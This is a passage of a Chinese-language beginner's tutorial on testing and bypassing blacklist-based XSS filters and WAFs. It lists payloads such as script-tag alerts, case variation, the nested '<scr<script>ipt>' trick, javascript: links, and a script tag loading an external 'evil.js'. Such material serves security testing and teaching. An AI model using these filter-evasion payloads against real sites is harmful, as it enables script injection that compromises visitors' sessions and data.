0x00 背景
本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是协议上问题,所以呢,基本可以通用于其他xss过滤的场景。方便新手们比较快速的了解到测试xss的一些基本的方法。
0x01 Bypassing黑名单
大多数的场所是用的黑名单来做过滤器的,有三种方式绕过黑名单的测试:
1、暴力测试(输入大量的payload,看返回结果)
2、根据正则推算
3、利用浏览器bug
初步测试
1)尝试插入比较正常的HTML标签,例如:<b>,<i>,<u>来看一下返回页面的情况是怎样的,是否被HTML编码了,或者标签被过滤了。
2)尝试插入不闭合的标签,例如:<b,<i,<u,<marquee然后看一下返回响应,是否对开放的标签也有过滤。
3)然后测试几个XSS的payload,基本所有的xss过滤器都会进行过滤的:
<script>alert(1);</script>
<script>prompt(1);</script>
<script>confirm(1);</script>
<scriptsrc="http://rhainfosec.com/evil.js">
看返回响应,是过滤的全部,还是只过滤了部分,是否还留下了alert,prompt,confirm字符,再尝试大小写的组合:
<scRiPt>alert(1);</scrIPt>
4)如果过滤器仅仅是把<script>和</script>标签过滤掉,那么可以用
<scr<script>ipt>alert(1)</scr<script>ipt>
的方式来绕过,这样当<script>标签被过滤掉,剩下的组合起来刚好形成一个完整的payload。
5)用<a href标签来测试,看返回响应
<a href="http://www.google.com">Clickme</a>
<a标签是否被过滤 href是否被过滤 href里的数据是否被过滤
如果没有数据被过滤,插入javascript协议看看:
<a href="javascript:alert(1)">Clickme</a>
是否返回错误 javascript的整个协议内容是否都被过滤掉,还是只过滤了javascript字符 尝试下大小写转换
继续测试事件触发执行